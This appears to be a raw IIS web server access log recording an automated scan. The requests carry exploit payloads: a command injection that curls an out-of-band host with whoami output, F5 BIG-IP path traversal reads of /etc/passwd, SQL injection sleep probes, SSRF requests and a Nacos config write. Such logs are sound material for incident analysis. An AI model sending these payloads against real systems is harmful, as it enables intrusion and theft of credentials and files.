Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 67 2023-11-24 21:20:09 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 443 - 173.239.196.197 Nacos-Server - 405 0 1 63 2023-11-24 21:34:24 103.153.214.94 GET /ajax/networking/get_netcfg.php iface=;curl%20clf0mb8n3tct4nj5icfgr7c37a9b5k1g3.oast.online/`whoami`; 443 - 173.239.196.194 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 66 2023-11-24 21:43:28 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/passwd 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 69 2023-11-24 21:43:30 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/f5-release 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 62 2023-11-24 21:43:31 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/config/bigip.license 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 63 2023-11-24 21:43:43 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 66 2023-11-24 21:43:44 103.153.214.94 POST /tmui/locallb/workspace/fileSave.jsp - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 63 2023-11-24 21:43:44 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 63 2023-11-24 21:43:46 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 62 2023-11-24 21:51:46 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 70 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 22:20:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 22:20:26 103.153.214.94 GET / url=http://0177.0.0.1/server-status 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 602 2023-11-24 22:20:26 103.153.214.94 GET / host=http://0177.0.0.1/server-status 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 65 2023-11-24 22:20:27 103.153.214.94 GET / file=http://0177.0.0.1/etc/passwd 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 63 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 23:22:06 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 23:22:06 103.153.214.94 GET /api/get_device_details - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn/assets/base/home.html 404 0 2 3073 2023-11-24 23:25:51 103.153.214.94 GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 193 2023-11-24 23:25:59 103.153.214.94 GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 68 2023-11-24 23:34:25 103.153.214.94 GET /oam/server/opensso/sessionservice - 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 68 2023-11-24 23:39:10 103.153.214.94 GET /openam/oauth2/..;/ccversion/Version - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 66